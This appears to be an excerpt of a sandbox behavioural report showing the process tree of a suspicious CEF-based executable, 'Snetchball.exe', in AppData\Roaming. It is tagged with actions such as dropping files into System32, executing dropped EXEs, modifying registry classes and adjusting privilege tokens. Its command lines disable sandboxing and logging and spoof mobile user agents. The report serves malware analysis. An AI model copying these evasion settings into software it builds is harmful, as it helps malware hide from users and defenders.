C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2012 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3788 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:830⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4040 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:830⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4148 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4104 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5424 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:230⤵
- Drops file in System32 directory
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3656 --field-trial-handle=2848,i,12180143956683332525,14853235146756958687,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2672 --field-trial-handle=2848,i,12180143956683332525,14853235146756958687,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵
- Checks computer location settings
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"19⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"19⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"19⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"19⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"19⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3700 --field-trial-handle=2896,i,16940211616307338609,14972543307505011645,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3764 --field-trial-handle=2896,i,16940211616307338609,14972543307505011645,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3476 --field-trial-handle=2880,i,4599515284367910489,2277805141044131385,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
- Checks computer location settings
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4076 --field-trial-handle=2880,i,4599515284367910489,2277805141044131385,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
- Checks computer location settings
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4060 --field-trial-handle=2880,i,4599515284367910489,2277805141044131385,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
- Checks computer location settings
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3916 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Checks computer location settings
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3684 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2132 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3696 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Checks computer location settings
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4088 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Checks computer location settings
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4784 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5524 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
- Executes dropped EXE
- Drops file in System32 directory
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 23164⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 19964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 23164⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 23244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21644⤵
- Program crash
-
-
